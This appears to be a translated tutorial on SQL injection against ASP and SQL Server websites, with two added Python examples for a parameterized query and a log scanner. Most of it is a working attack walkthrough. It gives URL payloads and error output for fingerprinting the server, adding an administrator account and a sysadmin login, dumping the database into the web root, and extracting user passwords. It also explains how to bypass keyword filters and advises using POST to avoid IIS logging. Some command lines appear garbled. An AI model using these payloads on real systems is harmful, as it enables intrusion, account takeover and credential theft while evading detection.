As applications built on the B/S (browser/server) model have become common, more and more programmers write applications this way. Because the entry threshold is low, however, their skill and experience vary widely. A considerable number of programmers never check the legality of user input when writing code, which leaves their applications with security holes. A user can submit database query code of his own and, from the results the program returns, obtain the data he wants; this is what is known as SQL injection.
SQL injection is a common attack that lets an unscrupulous user read your data, change the server's settings, or even take over your server if you are careless. SQL injection is not a problem with SQL Server itself but with badly written programs; if you run such programs, you must understand that you are taking on a certain risk.
1. Principle
To understand SQL injection you need some basics of B/S applications and of how the browser and the server interact. Given domestic conditions, more than 70% of domestic websites use ASP with Access or SQL Server, PHP with MySQL accounts for about 20%, and everything else is less than 10%. In an ASP + SQL Server application the ASP program is really a client of SQL Server: it needs a legitimate SQL login name and password to connect to the SQL Server database. The following fragment is a typical SQL Server connection in ASP:
<%
strServer = "IBM-WEB-01"      ' SQL Server address
strUid = "webuser"            ' SQL Server login name
strPwd = "xxxxxxxxf"          ' SQL Server login password
strDatabase = "SiteLog"       ' SQL Server database name
Set conn = Server.CreateObject("ADODB.Connection")
' DSN-less ODBC connection string built from the values above
conn.Open "Driver={SQL Server};Server=" & strServer & ";UID=" & strUid & ";PWD=" & strPwd & ";Database=" & strDatabase
%>
The weak point that SQL injection exploits is a WHERE clause that the developer builds by appending the user's input to it. For example, the following simple ASP program, article_show.asp, takes the parameter ID from the GET request and displays the row of the info_Article table whose ID matches it.
<%
strid = Trim(Request.QueryString("ID"))
strsql = "select * from info_Article where id = " & strid
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open strsql, conn, 1, 3
%>
<table>
<tr><td><div><%= rs("title") %></div></td></tr>
<tr><td><%= rs("content") %></td></tr>
</table>
Note the line strsql = "select * from info_Article where id = " & strid. In actual use a client accesses this ASP page with a URL such as http://www.abc.com/article_show.asp?id=12. With an ID of 12, strid holds the string "12"; VBScript's & operator concatenates data of any type, so after the concatenation strsql contains: select * from info_Article where id = 12, which is a normal SQL statement. VBScript is a weakly typed language in which variables need not be declared and carry no fixed type. That is sometimes convenient for the programmer, but it makes it easy to produce exploitable vulnerabilities. Because the program never checks the type of strid, it has a SQL injection vulnerability.
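A hardened counterpart to article_show.asp, added here as an example rather than code from the original article: the same lookup in Python against an in-memory SQLite table (the table and column names follow the article; the rows and the helper names are constructed), with the page's string concatenation shown beside an integer-validated, parameterized query.

```python
# Added example, not part of the original article: the article_show.asp lookup
# rewritten in Python against an in-memory SQLite table, with the page's string
# concatenation beside a validated, parameterized lookup. The table and column
# names follow the article; the two rows are constructed sample data.
import re
import sqlite3

def build_unsafe_query(strid):
    """Mirror of strsql = "select * from info_Article where id = " & strid:
    whatever the client sends is pasted into the SQL text, so id=12' yields
    a statement ending in 12' and id=12 and 1=2 changes the WHERE clause."""
    return "select * from info_Article where id = " + strid

def is_valid_id(strid):
    """Accept only a plain positive integer, which is all article_show.asp needs.
    Every probe in the article (a quote, 'and 1=2', a subquery) fails this test."""
    return re.fullmatch(r"\d{1,9}", strid.strip()) is not None

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table info_Article (id integer primary key, title text, content text)")
    conn.executemany("insert into info_Article values (?, ?, ?)",
                     [(12, "First title", "first body"), (13, "Second title", "second body")])
    return conn

def fetch_article(conn, strid):
    """Hardened lookup: validate first, then bind the value as a query parameter so
    the database driver never parses it as SQL. Returns (title, content) or None;
    raises ValueError for input that is not a plain integer."""
    if not is_valid_id(strid):
        raise ValueError("Illegal parameter value")
    return conn.execute("select title, content from info_Article where id = ?",
                        (int(strid),)).fetchone()

def show_article(strid):
    """Equivalent of the whole page: returns the title for a good id, or the
    application's own 'Illegal parameter value' message instead of a database error."""
    try:
        row = fetch_article(make_db(), strid)
    except ValueError as exc:
        return str(exc)
    return row[0] if row else "Not found"
```

The validation step is what turns the article's OLE DB errors into the application's own "Illegal parameter value" message, which section 2 lists among the responses that show injection will not work.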
2. Testing
Now enter the following URL in the browser: http://www.abc.com/article_show.asp?id=12'
At this point the value of strsql is: select * from info_Article where id = 12'
This is an invalid query in SQL Server, and the server returns the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
This error already shows that the site can be injected.
Sometimes the server only displays "An error occurred on the server when processing the URL", because IIS has been configured not to send detailed error messages to the client. That does not mean injection is impossible, but it becomes extremely difficult and can only be done by trial and error.
Sometimes the server still shows the content for ID=12 with no error message at all, which may mean the developer filters out single quotes. In that case try the following: article_show.asp?id=12 and 1=2
If the following error appears, injection may still be possible:
Error '80020009'
Exception occurred.
Note: if any of the following error messages appears, injection will definitely not succeed:
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'CInt'
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'CLng'
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'CDbl'
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'c'
Illegal parameter value.
Please enter the correct parameter value.
ADODB.Parameter error '800a0d5d'
Application uses a value of the wrong type for the current operation.
3. Collecting information
Once you have determined that injection is possible, the server can be probed as follows.
Find the SQL Server version:
article_show.asp?id=(select @@version)
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.
Find the login name SQL Server is currently using:
article_show.asp?id=(user_name())
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'webuser' to a column of data type int.
Note: if the connection is made as sa, dbo is displayed.
Find the database SQL Server is currently using:
article_show.asp?id=(db_name())
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'SiteLog' to a column of data type int.
Test whether the current user is a member of the sysadmin role:
The SQL statement SELECT IS_SRVROLEMEMBER('sysadmin') tests whether the currently logged-in user holds the sysadmin server role: it returns 1 if so and 0 if not. Here the result is converted to character data so that the actual value shows up in the error message. So write the following URL (char(115) is the character 's', and %2B is the URL encoding of the plus sign +):
article_show.asp?id=(select char(115)%2Bcast(is_srvrolemember('sysadmin') as varchar(2)))
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 's0' to a column of data type int.
If s0 is displayed, the user is not a member of sysadmin; if s1 is displayed, it is.
Test whether the current user is a member of the db_owner role:
article_show.asp?id=(select char(115)%2Bcast(is_member('db_owner') as varchar(2)))
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 's1' to a column of data type int.
By now a lot of valuable information has been collected. If the test shows that the current user is a member of sysadmin, there is a good chance of running a command shell on the SQL Server host. If it is db_owner, any operation on the currently connected database is possible: creating tables, dropping tables, inserting data, reading data, and so on.
4. What a user with sysadmin privileges can do
Note: from here on the server's error messages are no longer listed in detail; only the usable SQL statements are given.
Add an NT user:
article_show.asp?id=12;exec master "net user name password /add"--
Add that user to the Administrators group:
article_show.asp?id=12;exec master "net localgroup name administrators /add"--
Make a complete backup of the database into the website directory so it can be downloaded:
article_show.asp?id=12;backup database <database name> to disk='c:/inetpub/wwwroot/1.db';--
Add a SQL Server login:
article_show.asp?id=12;exec sp_addlogin 'uname','pwd'--
article_show.asp?id=12;exec sp_addsrvrolemember 'uname','sysadmin'--
The reverse operations:
Remove the login from the sysadmin fixed server role:
article_show.asp?id=12;exec sp_dropsrvrolemember 'uname','sysadmin'--
Remove the user from the db_owner role of the database:
article_show.asp?id=12;exec sp_dropuser 'uname'--
Delete the login:
article_show.asp?id=12;exec sp_droplogin 'uname'--
After each of the above operations the server generally displays either the normal ID=12 page or the following:
Error '80020009'
Exception occurred.
5. What an ordinary user can do
An ordinary user cannot use the commands listed in section 4, but can still read all the data in the database.
Use the following statement to list the name of the first user table in the database:
article_show.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in (''))
Having obtained the first table name, info_files, get the second table name with the following statement:
article_show.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('info_files'))
Having obtained the second table name, info_articles, get the third table name with the following statement:
article_show.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('info_files','info_articles'))
Suppose the third table is named info_users.
Use the following statement to get the name of the first field of the info_users table:
article_show.asp?id=(select col_name(object_id('info_users'),1))
Use the following statement to get the name of the second field of the info_users table:
article_show.asp?id=(select col_name(object_id('info_users'),2))
Suppose the structure of info_users turns out to be ID, UserName, Password. Then use the following statement to get the UserName of the first record:
article_show.asp?id=(select top 1 username from info_users)
Use the following statement to get the Password of the first record:
article_show.asp?id=(select top 1 password from info_users)
Use the following statement to get the ID of the first record:
article_show.asp?id=(select top 1 char(115)%2Bcast(id as varchar(2)) from info_users)
6. Additional notes
Many developers try to "prevent" injection by filtering keywords, but such filters can still be bypassed and the program's restrictions defeated. For example, look at how these statements can be transformed:
The simple cases first: for where xtype='u', the ASCII code of the character u is 85, so you can write where xtype=char(85) instead; if the characters are Chinese, for example where name='用户' ("user"), you can write where name=nchar(29992)+nchar(25143) instead.
Some people filter these keywords but forget about case sensitivity, so try SELECT in upper case.
When you cannot guess a field name, look at the site's login form: the field names are usually the same as the names of the form's input boxes. Special note: in the address bar a + sign is interpreted as a space, %2B as a + sign, and %25 as a % sign; see urlencode for details.
With the GET method IIS records every string you submit in its log; POST requests are not logged that way, so use POST rather than GET where possible.
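Because IIS keeps those query strings, a defender can look for the probes this article walks through in the W3C log. The following Python scanner is an added example, not part of the original article; the log lines are constructed, and the field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is assumed.

```python
# Added example, not part of the original article: scan IIS W3C log lines for the
# article_show.asp probes described above. The log lines are constructed; the
# field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is assumed.
import re
from urllib.parse import unquote_plus

# Signatures of the article's probes, matched case-insensitively after URL decoding
# (so id=12%27, ID=12' and %2B-encoded plus signs are all seen in decoded form).
PROBE_RE = re.compile("|".join([
    r"'",                            # quote test: id=12'
    r"\band\s+1\s*=\s*[12]\b",       # boolean test: id=12 and 1=2
    r"@@version", r"user_name\s*\(", r"db_name\s*\(", r"is_srvrolemember", r"is_member\s*\(",
    r"\bsysobjects\b", r"col_name\s*\(", r";\s*exec\b", r"backup\s+database",
    r"n?char\s*\(\s*\d+\s*\)",       # char(85)/nchar(29992) keyword smuggling
]), re.IGNORECASE)

def suspicious(uri_stem, uri_query):
    """Return a reason when the request looks like a probe against article_show.asp, else None."""
    if uri_stem.lower() != "/article_show.asp":
        return None
    query = unquote_plus(uri_query)              # '+' -> space, %2B -> '+', as the server decodes it
    m = re.search(r"(?:^|&)id=([^&]*)", query, re.IGNORECASE)
    if not m or m.group(1).strip().isdigit():
        return None                              # no id, or a well-formed numeric id such as 12
    value = m.group(1).strip()
    hit = PROBE_RE.search(value)
    return f"id={value!r} matched {hit.group(0)!r}" if hit else f"non-numeric id={value!r}"

def scan(log_text):
    """Return a list of (client ip, reason) for every suspicious request in a W3C log."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) != 7:  # skip directives and malformed lines
            continue
        _date, _time, c_ip, _method, stem, query, _status = parts
        why = suspicious(stem, query)
        if why:
            hits.append((c_ip, why))
    return hits

SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-09-01 10:00:01 192.0.2.10 GET /article_show.asp id=12 200
2003-09-01 10:00:05 192.0.2.10 GET /article_show.asp id=12' 500
2003-09-01 10:00:09 192.0.2.10 GET /article_show.asp id=12+and+1=2 500
2003-09-01 10:00:14 192.0.2.10 GET /article_show.asp id=(select+@@version) 500
2003-09-01 10:00:20 192.0.2.10 GET /article_show.asp id=(select+char(115)%2Bcast(is_srvrolemember('sysadmin')+as+varchar(2))) 500
2003-09-01 10:00:30 192.0.2.11 GET /index.asp - 200
"""
```

A run of 500 responses from one client on the same page is itself a strong signal, so correlating these hits with sc-status is worthwhile.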
SQL injection against SQL Server is not limited to what is described above; you can craft many clever SQL statements of your own. After installing SQL Server, consult SQL Server Books Online, which documents every statement, function and system stored procedure as well as the security features of SQL Server; it is an excellent reference.